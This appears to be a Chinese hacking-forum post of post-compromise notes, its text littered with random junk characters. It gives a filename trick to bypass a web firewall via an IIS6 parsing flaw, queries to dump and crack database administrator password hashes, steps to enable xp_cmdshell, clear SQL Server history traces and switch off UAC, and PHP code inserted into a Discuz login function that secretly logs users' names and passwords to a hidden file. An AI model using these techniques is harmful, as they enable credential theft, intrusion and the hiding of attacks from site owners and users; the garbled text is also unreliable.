8 F, h% e8 h3 d" c$ V8 o+ N( ?5 ]就是搜索case ‘login’
+ B3 p7 Z4 x# @  H在它下面直接插入即可,记录的密码生成在pwd.txt中,; R. h/ V. ~  ]
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
* w- D* k7 z  f5 l, m# z3 L利用II6文件解析漏洞绕过安全狗代码:& R" X( m! W6 K; |! h& W/ H' h. C
;antian365.asp;antian365.jpg' `4 P8 K9 K2 s/ N

4 q+ H# T' S! M, I8 E各种类型数据库抓HASH破解最高权限密码!
$ ?7 H8 [* {0 A3 B$ g1.sql server2000
' _6 e- z3 ]- \" A& |$ c% O* M+ MSELECT password from master.dbo.sysxlogins where name='sa'
$ Z+ U! s$ [" B0 s: T+ X0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
# K" i) I$ }* w! e( J2FD54D6119FFF04129A1D72E7C3194F7284A7F3A0 b6 \% g, _, }0 D
9 z; l6 U/ Z7 I6 B) e0 |
0×0100- constant header+ W3 |7 D& z9 M+ K# L1 d* h
34767D5C- salt
+ Y: W- n5 l9 {, X' N0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
4 E6 W- B5 C4 T/ g2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
6 |6 x0 _3 ^( [' n1 C, [crack the upper case hash in ‘cain and abel’ and then work the case sentive hash6 V* ^" r% |/ P- B6 ^. H% X
SQL server 2005:-
) Z5 e; V1 `7 M& ?SELECT password_hash FROM sys.sql_logins where name='sa'$ z5 F2 E% O9 f' K+ x, Y
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
7 D, s: D- {7 `( ?& x0×0100- constant header% t! |' R% j) C, C) \1 l
993BF231-salt
7 A) ?3 u# @6 k0 o2 g) w( S* V; G5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash( V* `- v2 L* w1 j
crack case sensitive hash in cain, try brute force and dictionary based attacks.
- e# D- A, [0 r) Z3 q+ X# T- Q4 a; j; e, S2 g3 d# M9 t0 N
update:- following bernardo’s comments:-) s6 p& |8 I: i4 F7 Y8 q+ J; v
use function fn_varbintohexstr() to cast password in a hex string.
" U/ M6 p0 Z7 t  Z3 A$ _1 @  Te.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins5 M. J2 E) ?+ w$ \& I. b6 k
1 `* ?& F2 A3 f$ \
MYSQL:-/ D0 b6 u7 J, b
  l2 I  J/ ~4 V6 _5 x1 K! Z
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.& N+ H- N% j9 J8 w

+ M" Z8 Y! A( f- ], u* X( F* E*mysql  < 4.1' W3 v: W( N- ]6 `
* S9 q) J; P( B3 b8 V$ ?2 y
mysql> SELECT PASSWORD(‘mypass’);
# X' X2 o( w% `2 a% G6 p& J+——————–+
2 [* k/ a% A/ c8 I% q8 E3 R. h| PASSWORD(‘mypass’) |
6 g+ c" {+ H6 S) F+——————–+! t% ~& c6 |6 i$ W& ?! x" e
| 6f8c114b58f2ce9e   |
( N: u6 o/ h, J: N+——————–+! u4 z0 Y: Y' p/ ?' I
0 W& b  b4 c( C+ ~" |5 E) N
*mysql >=4.1
4 X. c, ~. I3 z/ \  R# @0 b" y5 e; Q: B
mysql> SELECT PASSWORD(‘mypass’);! s* C5 i7 Z' @* A0 J
+——————————————-+  U* @! e, y' [' \
| PASSWORD(‘mypass’)                        |7 y1 V/ @9 p% a$ l6 ^' }; s3 Z
+——————————————-+  T0 v2 V4 w: x$ c: h! {( C8 i
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
1 o1 o$ {" R; X5 }& k+——————————————-+& P9 ?( O9 z% J) Z! t

0 \3 H  [4 [3 B2 ?Select user, password from mysql.user+ b* f6 g& W0 O1 y1 T% G3 i
The hashes can be cracked in ‘cain and abel’2 K  Q3 z: K/ K$ V% a) w

4 i; G  [" k6 n2 M" {0 UPostgres:-4 Z5 P7 U- m/ C
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
3 L, V, U+ c$ u& yselect usename, passwd from pg_shadow;
3 l7 w7 l5 l5 S5 K7 kusename      |  passwd
2 N$ J' Q7 e5 _——————+————————————-, ]" m: n# A$ ^3 T4 P5 M
testuser            | md5fabb6d7172aadfda4753bf0507ed4396. E$ ~+ }, e0 L) [0 Q
use mdcrack to crack these hashes:-
$ L& ^& i  G- j- Z. ^, B7 L$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
7 I1 m8 }! F& c$ w6 K5 M
' L/ q4 y1 L7 T! t2 j9 L1 LOracle:-
# e' Z4 x3 K; |select name, password, spare4 from sys.user$
; t" _7 M- p4 l& J/ [: y& _, ohashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g4 ~7 Y2 U' J5 p
More on Oracle later, i am a bit bored….
* ~; [2 S+ b! E) C0 h9 v
1 }% R0 [& X6 S3 V4 q
! }' H* X7 I, A3 h7 I$ \" `在sql server2005/2008中开启xp_cmdshell
  |# S. X; s# j0 g3 W7 W9 k-- To allow advanced options to be changed.  |' s: v+ ~' V
EXEC sp_configure 'show advanced options', 1- i7 k8 o; L7 `* {  R8 J( B; a
GO
2 J, t( b5 g; V4 }" v. R/ _5 W& V9 l-- To update the currently configured value for advanced options.5 i: z$ t# S( M; [( H
RECONFIGURE# x5 k& N6 Q! p3 Z
GO
: i2 o/ O  {  l1 D, T-- To enable the feature.
/ q  _' s0 {' H3 o( J6 g' Y$ iEXEC sp_configure 'xp_cmdshell', 17 T! Z+ ?' e3 L% ?* d& ?: i
GO$ P5 j4 R3 R) J. e2 h0 L- q- s
-- To update the currently configured value for this feature.& O& l* Q' U( {- _: m; S6 r3 W+ o
RECONFIGURE
8 \+ P9 e4 M# [7 vGO
9 w+ r% S; V  \# K5 }, [SQL 2008 server日志清除,在清楚前一定要备份。% W" u) }& t8 y
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
* K4 L' a( W1 }1 `. o' q5 I/ BX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
; U- I  ^- [* p% z9 m0 w) Y, l- |
; F" U* Z+ w7 X- k+ g对于SQL Server 2008以前的版本:  a4 Z7 }. c- F. C+ a: G# i# {1 [
SQL Server 2005:0 l, M; L* g2 q9 m3 ~; j
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat/ O& H8 W4 T4 Z  ~& l) z5 g
SQL Server 2000:
/ T* M' s  y6 z$ `/ k  D: o: k2 ^清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。$ p7 _& E) [  O$ d
4 L; p4 I1 ]. U
本帖最后由 simeon 于 2013-1-3 09:51 编辑2 Y0 {6 F2 m, {- i3 g0 |
# j. Y8 N3 d6 t& B/ H; O1 I5 m: T

1 `! C. a" _7 t+ f& Pwindows 2008 文件权限修改
4 Q+ O4 Z3 I  `2 r; }( A1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx' @- q( q  |. w+ |- L8 L7 ~
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98# O0 W0 I% f2 g, Z* y3 v. [' e' I
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,* c, G7 E2 e6 x7 O6 M
8 I) l5 Z9 P$ o
Windows Registry Editor Version 5.00
' k$ h6 t' n7 M5 I[HKEY_CLASSES_ROOT\*\shell\runas]
8 b8 q0 l0 q' T; W  S* i@="管理员取得所有权"* r" K5 A) h2 B6 L: I
"NoWorkingDirectory"=""
' h8 d3 e  g! Y; f) z. x[HKEY_CLASSES_ROOT\*\shell\runas\command]* @2 b& d, s5 M' g
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"1 L1 S* J% a1 x  r3 z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"4 n: j9 ]' }3 O2 k4 u8 V
[HKEY_CLASSES_ROOT\exefile\shell\runas2]$ ?7 o1 x, J( a0 Z# b9 s
@="管理员取得所有权"- C3 x; c  ?, ?
"NoWorkingDirectory"=""
; k" f$ `4 q' _7 H1 L# q[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
4 w; f% V7 I2 ~' T3 y7 Q# Y9 `4 x4 f@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ I9 ]6 ?2 i" B7 ~( x) R
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 g. G" ?, ]' o, u
3 }4 m3 N. A1 e1 W: V* Y( e
[HKEY_CLASSES_ROOT\Directory\shell\runas]$ f3 s  i+ J3 @. c- C% K
@="管理员取得所有权"! F) x1 I& s: j! p1 D
"NoWorkingDirectory"=""
& }4 T6 ]. F$ u8 C8 r[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
- Q( d, i. d9 C0 [0 s@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 @; l* U& c) }"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t". D0 \& T& y1 _% Q$ C/ l0 n  I. I
& S2 G2 D& ~# J) o! n$ M0 i/ X9 J
: h" g! D- D2 v. k
win7右键“管理员取得所有权”.reg导入* |0 k6 C  n( D# t4 N9 S
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,9 W- {  `( Q, r4 k9 G# Z' Z( z
1、C:\Windows这个路径的“notepad.exe”不需要替换
/ |% Q4 u9 Y, l" t2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
. o7 z8 N2 n5 `1 ~% k5 c  y3、四个“notepad.exe.mui”不要管
8 J1 U! G3 g- U  f# p# J+ C2 a4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
# N& x& W9 }, w* a5 ~4 A% t" P* QC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”8 n. O  C+ r& @4 \, a* M
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
, i+ z( [1 H) Q$ e" j9 q替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
3 y& n/ u# `4 F% b% }9 fwindows 2008中关闭安全策略:   ^) G7 g* z4 R
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f! \7 m7 J3 e) M, Y- A+ H% x/ i
修改uc_client目录下的client.php 在
  b1 I) }! y+ L$ C0 T* U3 A/ Afunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
+ |7 I" m4 x' u( F5 l下加入如上代码,在网站./data/cache/目录下自动生成csslog.php; A; M8 F& {- [* y" p) g( Z
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw* I* n7 a7 E( O/ r
if(getenv('HTTP_CLIENT_IP')) {. M2 s2 K9 d1 f: Z
$onlineip = getenv('HTTP_CLIENT_IP');- t) t, P! ^4 k+ `5 _# t
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {" p  i! g( u) i( p# C4 l
$onlineip = getenv('HTTP_X_FORWARDED_FOR');$ b$ O( i; r9 j: n. f+ t
} elseif(getenv('REMOTE_ADDR')) {; e. Q0 i3 v6 H# L$ l2 Y: w. ?
$onlineip = getenv('REMOTE_ADDR');
8 `  d8 h. n/ k& k} else {
! L  d- y7 K4 u, a8 L( u6 b$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];- i! T. `6 S* B. R
}$ T3 X6 i' T* Q( I
     $showtime=date("Y-m-d H:i:s");) a9 r8 q$ l% K0 j, k& R" x1 v! U
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
8 u% `+ J, f% P" G    $handle=fopen('./data/cache/csslog.php','a+');8 Q5 V2 K- s0 S, y
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表